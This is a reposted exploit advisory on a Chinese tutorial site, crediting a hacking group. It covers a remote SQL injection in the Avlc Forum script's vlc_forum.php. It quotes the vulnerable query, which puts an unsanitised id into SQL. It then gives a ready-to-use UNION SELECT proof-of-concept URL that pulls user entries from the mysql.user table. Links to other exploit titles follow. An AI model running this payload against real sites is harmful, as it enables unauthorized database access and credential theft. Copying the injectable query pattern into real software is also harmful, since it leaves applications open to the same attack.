手机
当前位置:查字典教程网 >网络安全 >Exploit >Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
摘要:====================================================================Av...

====================================================================

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

====================================================================

,--^----------,--------,-----,-------^--,

| ||||||||| `--------' | O .. CWH Underground Hacking Team ..

` ---------------------------^----------|

`_,-------, _________________________|

/ XXXXXX /`| /

/ XXXXXX / ` /

/ XXXXXX /______(

/ XXXXXX /

/ XXXXXX /

(________(

`------'

AUTHOR : CWH Underground

DATE : 12 July 2008

SITE : cwh.citec.us

#####################################################

APPLICATION : Avlc Forum

VERSION : N/A

VENDOR : N/A

DOWNLOAD : http://www.easy-script.com/compt.php?id=2147

#####################################################

-- Remote SQL Injection ---

---------------------------------

Vulnerable File [vlc_forum.php]

---------------------------------

@Line

141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";

142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());

-------------

POC Exploit

-------------

[ ] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--

#####################################################################

Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos

Special Thx : asylu3, str0ke, citec.us, milw0rm.com

#####################################################################

【Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability】相关文章:

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

LoveCMS 1.6.2 Final Update Settings Remote Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

minb 0.1.0 Remote Code Execution Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

精品推荐
分类导航